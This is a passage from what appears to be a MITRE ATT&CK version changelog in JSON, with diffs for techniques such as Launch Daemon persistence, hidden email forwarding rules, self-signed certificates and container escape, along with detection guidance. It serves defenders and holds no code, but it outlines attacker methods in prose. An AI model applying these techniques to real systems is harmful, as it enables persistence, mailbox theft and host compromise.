legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)\\n\\n\", \"old_value\": \"Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. \", \"diff\": \"--- \\n+++ \\n@@ -1 +1,4 @@\\n-Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. \\n+Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\\n+\\n+Some legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)\\n+\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][7]\": {\"source_name\": \"OSX Malware Detection\", \"description\": \"Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.\", \"url\": \"https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf\"}, \"root['external_references'][8]\": {\"source_name\": \"LaunchDaemon Hijacking\", \"description\": \"Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.\", \"url\": \"https://bradleyjkemp.dev/post/launchdaemon-hijacking/\"}, \"root['external_references'][9]\": {\"source_name\": \"sentinelone macos persist Jun 2019\", \"description\": \"Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.\", \"url\": \"https://www.sentinelone.com/blog/how-malware-persists-on-macos/\"}, \"root['x_mitre_effective_permissions'][1]\": \"Administrator\"}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may create or modify launch daemons to repeatedl | t | 1 | Adversaries may create or modify Launch Daemons to execute m |
| > | y execute malicious payloads as part of persistence. Per App | > | alicious payloads as part of persistence. Launch Daemons are | ||
| > | le\u2019s developer documentation, when macOS and OS X boot up, l | > | plist files used to interact with Launchd, the service mana | ||
| > | aunchd is run to finish system initialization. This process | > | gement framework used by macOS. Launch Daemons require eleva | ||
| > | loads the parameters for each launch-on-demand system-level | > | ted privileges to install, are executed for every user on a | ||
| > | daemon from the property list (plist) files found in <code>/ | > | system prior to login, and run in the background without the | ||
| > | System/Library/LaunchDaemons</code> and <code>/Library/Launc | > | need for user interaction. During the macOS initialization | ||
| > | hDaemons</code> (Citation: AppleDocs Launch Agent Daemons). | > | startup, the launchd process loads the parameters for launch | ||
| > | These LaunchDaemons have property list files which point to | > | -on-demand system-level daemons from plist files found in <c | ||
| > | the executables that will be launched (Citation: Methods of | > | ode>/System/Library/LaunchDaemons/</code> and <code>/Library | ||
| > | Mac Malware Persistence). Adversaries may install a new la | > | /LaunchDaemons/</code>. Required Launch Daemons parameters i | ||
| > | unch daemon that can be configured to execute at startup by | > | nclude a <code>Label</code> to identify the task, <code>Prog | ||
| > | using launchd or launchctl to load a plist into the appropri | > | ram</code> to provide a path to the executable, and <code>Ru | ||
| > | ate directories (Citation: OSX Malware Detection). The daem | > | nAtLoad</code> to specify when the task is run. Launch Daemo | ||
| > | on name may be disguised by using a name from a related oper | > | ns are often used to provide access to shared resources, upd | ||
| > | ating system or benign software (Citation: WireLurker). Laun | > | ates to software, or conduct automation tasks.(Citation: App | ||
| > | ch Daemons may be created with administrator privileges, but | > | leDocs Launch Agent Daemons)(Citation: Methods of Mac Malwar | ||
| > | are executed under root privileges, so an adversary may als | > | e Persistence)(Citation: launchd Keywords for plists) Adver | ||
| > | o use a service to escalate privileges from administrator to | > | saries may install a Launch Daemon configured to execute at | ||
| > | root. The plist file permissions must be root:wheel, but | > | startup by using the <code>RunAtLoad</code> parameter set to | ||
| > | the script or program that it points to has no such requirem | > | <code>true</code> and the <code>Program</code> parameter se | ||
| > | ent. So, it is possible for poor configurations to allow an | > | t to the malicious executable path. The daemon name may be d | ||
| > | adversary to modify a current Launch Daemon\u2019s executable and | > | isguised by using a name from a related operating system or | ||
| > | gain persistence or Privilege Escalation. | > | benign software (i.e. [Masquerading](https://attack.mitre.or | ||
| > | g/techniques/T1036)). When the Launch Daemon is executed, th | ||||
| > | e program inherits administrative permissions.(Citation: Wir | ||||
| > | eLurker)(Citation: OSX Malware Detection) Additionally, sys | ||||
| > | tem configuration changes (such as the installation of third | ||||
| > | party package managing software) may cause folders such as | ||||
| > | <code>usr/local/bin</code> to become globally writeable. So, | ||||
| > | it is possible for poor configurations to allow an adversar | ||||
| > | y to modify executables referenced by current Launch Daemon' | ||||
| > | s plist files.(Citation: LaunchDaemon Hijacking)(Citation: s | ||||
| > | entinelone macos persist Jun 2019) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may leverage information repositories to mine va | t | 1 | Adversaries may leverage information repositories to mine va |
| > | luable information. Information repositories are tools that | > | luable information. Information repositories are tools that | ||
| > | allow for storage of information, typically to facilitate co | > | allow for storage of information, typically to facilitate co | ||
| > | llaboration or information sharing between users, and can st | > | llaboration or information sharing between users, and can st | ||
| > | ore a wide variety of data that may aid adversaries in furth | > | ore a wide variety of data that may aid adversaries in furth | ||
| > | er objectives, or direct access to the target information. | > | er objectives, or direct access to the target information. A | ||
| > | The following is a brief list of example information that ma | > | dversaries may also abuse external sharing features to share | ||
| > | y hold potential value to an adversary and may also be found | > | sensitive documents with recipients outside of the organiza | ||
| > | on an information repository: * Policies, procedures, and | > | tion. The following is a brief list of example information | ||
| > | standards * Physical / logical network diagrams * System arc | > | that may hold potential value to an adversary and may also | ||
| > | hitecture diagrams * Technical system documentation * Testin | > | be found on an information repository: * Policies, procedur | ||
| > | g / development credentials * Work / project schedules * Sou | > | es, and standards * Physical / logical network diagrams * Sy | ||
| > | rce code snippets * Links to network shares and other intern | > | stem architecture diagrams * Technical system documentation | ||
| > | al resources Information stored in a repository may vary ba | > | * Testing / development credentials * Work / project schedul | ||
| > | sed on the specific instance or environment. Specific common | > | es * Source code snippets * Links to network shares and othe | ||
| > | information repositories include [Sharepoint](https://attac | > | r internal resources Information stored in a repository may | ||
| > | k.mitre.org/techniques/T1213/002), [Confluence](https://atta | > | vary based on the specific instance or environment. Specifi | ||
| > | ck.mitre.org/techniques/T1213/001), and enterprise databases | > | c common information repositories include web-based platform | ||
| > | such as SQL Server. | > | s such as [Sharepoint](https://attack.mitre.org/techniques/T | ||
| > | 1213/002) and [Confluence](https://attack.mitre.org/techniqu | ||||
| > | es/T1213/001), specific services such as Code Repositories, | ||||
| > | IaaS databases, enterprise databases, and other storage infr | ||||
| > | astructure such as SQL Server. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may create self-signed SSL/TLS certificates that | t | 1 | Adversaries may create self-signed SSL/TLS certificates that |
| > | can be used during targeting. SSL/TLS certificates are desi | > | can be used during targeting. SSL/TLS certificates are desi | ||
| > | gned to instill trust. They include information about the ke | > | gned to instill trust. They include information about the ke | ||
| > | y, information about its owner's identity, and the digital s | > | y, information about its owner's identity, and the digital s | ||
| > | ignature of an entity that has verified the certificate's co | > | ignature of an entity that has verified the certificate's co | ||
| > | ntents are correct. If the signature is valid, and the perso | > | ntents are correct. If the signature is valid, and the perso | ||
| > | n examining the certificate trusts the signer, then they kno | > | n examining the certificate trusts the signer, then they kno | ||
| > | w they can use that key to communicate with its owner. In th | > | w they can use that key to communicate with its owner. In th | ||
| > | e case of self-signing, digital certificates will lack the e | > | e case of self-signing, digital certificates will lack the e | ||
| > | lement of trust associated with the signature of a third-par | > | lement of trust associated with the signature of a third-par | ||
| > | ty certificate authority (CA). Adversaries may create self- | > | ty certificate authority (CA). Adversaries may create self- | ||
| > | signed SSL/TLS certificates that can be used to further thei | > | signed SSL/TLS certificates that can be used to further thei | ||
| > | r operations, such as encrypting C2 traffic (ex: [Asymmetric | > | r operations, such as encrypting C2 traffic (ex: [Asymmetric | ||
| > | Cryptography](https://attack.mitre.org/techniques/T1573/002 | > | Cryptography](https://attack.mitre.org/techniques/T1573/002 | ||
| > | ) with [Web Protocols](https://attack.mitre.org/techniques/T | > | ) with [Web Protocols](https://attack.mitre.org/techniques/T | ||
| > | 1071/001)) or even enabling [Man-in-the-Middle](https://atta | > | 1071/001)) or even enabling [Adversary-in-the-Middle](https: | ||
| > | ck.mitre.org/techniques/T1557) if added to the root of trust | > | //attack.mitre.org/techniques/T1557) if added to the root of | ||
| > | (i.e. [Install Root Certificate](https://attack.mitre.org/t | > | trust (i.e. [Install Root Certificate](https://attack.mitre | ||
| > | echniques/T1553/004)). After creating a digital certificate | > | .org/techniques/T1553/004)). After creating a digital certi | ||
| > | , an adversary may then install that certificate (see [Insta | > | ficate, an adversary may then install that certificate (see | ||
| > | ll Digital Certificate](https://attack.mitre.org/techniques/ | > | [Install Digital Certificate](https://attack.mitre.org/techn | ||
| > | T1608/003)) on infrastructure under their control. | > | iques/T1608/003)) on infrastructure under their control. |
X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Office 365",
"Google Workspace",
"macOS",
"Linux"
],
"x_mitre_version": "2.3",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 20:19:33.750000+00:00\", \"old_value\": \"2021-04-14 14:22:44.435000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.3\", \"old_value\": \"2.2\"}}, \"iterable_item_added\": {\"root['x_mitre_platforms'][3]\": \"macOS\", \"root['x_mitre_platforms'][4]\": \"Linux\"}}",
"previous_version": "2.2",
"version_change": "2.2 \u2192 2.3",
"changelog_mitigations": {
"shared": [
"M1032: Multi-factor Authentication",
"M1041: Encrypt Sensitive Information",
"M1047: Audit",
"T1114: Email Collection Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0015: Application Log (Application Log Content)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Access)",
"DS0028: Logon Session (Logon Session Creation)",
"DS0029: Network Traffic (Network Connection Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-02-19 18:54:47.103000+00:00",
"modified": "2021-10-15 20:19:33.416000+00:00",
"name": "Email Forwarding Rule",
"description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim\u2019s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "collection"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1114/003",
"external_id": "T1114.003"
},
{
"source_name": "US-CERT TA18-068A 2018",
"description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.",
"url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"
},
{
"source_name": "Pfammatter - Hidden Inbox Rules",
"description": "Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.",
"url": "https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/"
},
{
"source_name": "Microsoft Tim McMichael Exchange Mail Forwarding 2",
"description": "McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.",
"url": "https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/"
},
{
"source_name": "Mac Forwarding Rules",
"description": "Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.",
"url": "https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Microsoft Security",
"Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
],
"x_mitre_data_sources": [
"Application Log: Application Log Content"
],
"x_mitre_detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Office 365",
"Windows",
"Google Workspace",
"macOS",
"Linux"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 20:19:33.416000+00:00\", \"old_value\": \"2021-03-25 13:08:30.699000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim\\u2019s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\\n\\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)\", \"old_value\": \"Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim\\u2019s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Similarly, Google Workspace users or administrators can set up mail forwarding rules via the Google Workspace web interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) \\n\\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim\\u2019s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Similarly, Google Workspace users or administrators can set up mail forwarding rules via the Google Workspace web interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) \\n+Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim\\u2019s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\\n \\n-Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more.\\n+Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"Pfammatter - Hidden Inbox Rules\", \"old_value\": \"Microsoft Tim McMichael Exchange Mail Forwarding 2\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.\", \"old_value\": \"McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/\", \"old_value\": \"https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\\n\\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.\", \"old_value\": \"Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\\n\\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\\n+Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\\n \\n Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][3]\": {\"source_name\": \"Microsoft Tim McMichael Exchange Mail Forwarding 2\", \"description\": \"McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.\", \"url\": \"https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/\"}, \"root['external_references'][4]\": {\"source_name\": \"Mac Forwarding Rules\", \"description\": \"Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.\", \"url\": \"https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac\"}, \"root['x_mitre_contributors'][0]\": \"Microsoft Security\", \"root['x_mitre_platforms'][3]\": \"macOS\", \"root['x_mitre_platforms'][4]\": \"Linux\"}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may setup email forwarding rules to collect sens | t | 1 | Adversaries may setup email forwarding rules to collect sens |
| > | itive information. Adversaries may abuse email-forwarding ru | > | itive information. Adversaries may abuse email-forwarding ru | ||
| > | les to monitor the activities of a victim, steal information | > | les to monitor the activities of a victim, steal information | ||
| > | , and further gain intelligence on the victim or the victim\u2019 | > | , and further gain intelligence on the victim or the victim\u2019 | ||
| > | s organization to use as part of further exploits or operati | > | s organization to use as part of further exploits or operati | ||
| > | ons.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook W | > | ons.(Citation: US-CERT TA18-068A 2018) Furthermore, email fo | ||
| > | eb App (OWA) allow users to create inbox rules for various e | > | rwarding rules can allow adversaries to maintain persistent | ||
| > | mail functions, including forwarding to a different recipien | > | access to victim's emails even after compromised credentials | ||
| > | t. Similarly, Google Workspace users or administrators can s | > | are reset by administrators.(Citation: Pfammatter - Hidden | ||
| > | et up mail forwarding rules via the Google Workspace web int | > | Inbox Rules) Most email clients allow users to create inbox | ||
| > | erface. Messages can be forwarded to internal or external re | > | rules for various email functions, including forwarding to a | ||
| > | cipients, and there are no restrictions limiting the extent | > | different recipient. These rules may be created through a l | ||
| > | of this rule. Administrators may also create forwarding rule | > | ocal email application, a web interface, or by command-line | ||
| > | s for user accounts with the same considerations and outcome | > | interface. Messages can be forwarded to internal or external | ||
| > | s.(Citation: Microsoft Tim McMichael Exchange Mail Forwardin | > | recipients, and there are no restrictions limiting the exte | ||
| > | g 2) Any user or administrator within the organization (or | > | nt of this rule. Administrators may also create forwarding r | ||
| > | adversary with valid credentials) can create rules to autom | > | ules for user accounts with the same considerations and outc | ||
| > | atically forward all received messages to another recipient, | > | omes.(Citation: Microsoft Tim McMichael Exchange Mail Forwar | ||
| > | forward emails to different locations based on the sender, | > | ding 2)(Citation: Mac Forwarding Rules) Any user or adminis | ||
| > | and more. | > | trator within the organization (or adversary with valid cred | ||
| > | entials) can create rules to automatically forward all recei | ||||
| > | ved messages to another recipient, forward emails to differe | ||||
| > | nt locations based on the sender, and more. Adversaries may | ||||
| > | also hide the rule by making use of the Microsoft Messaging | ||||
| > | API (MAPI) to modify the rule properties, making it hidden a | ||||
| > | nd not visible from Outlook, OWA or most Exchange Administra | ||||
| > | tion tools.(Citation: Pfammatter - Hidden Inbox Rules) |
mount (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"Administrator",
"User",
"root"
],
"x_mitre_platforms": [
"Windows",
"Linux",
"Containers"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 14:59:35.913000+00:00\", \"old_value\": \"2021-04-22 16:14:59.756000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)\\n\\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host\\u2019s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)\\n\\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.\", \"old_value\": \"Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)\\n\\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host\\u2019s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, and utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)\\n \\n-There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host\\u2019s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, and utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.\\n+There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host\\u2019s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to 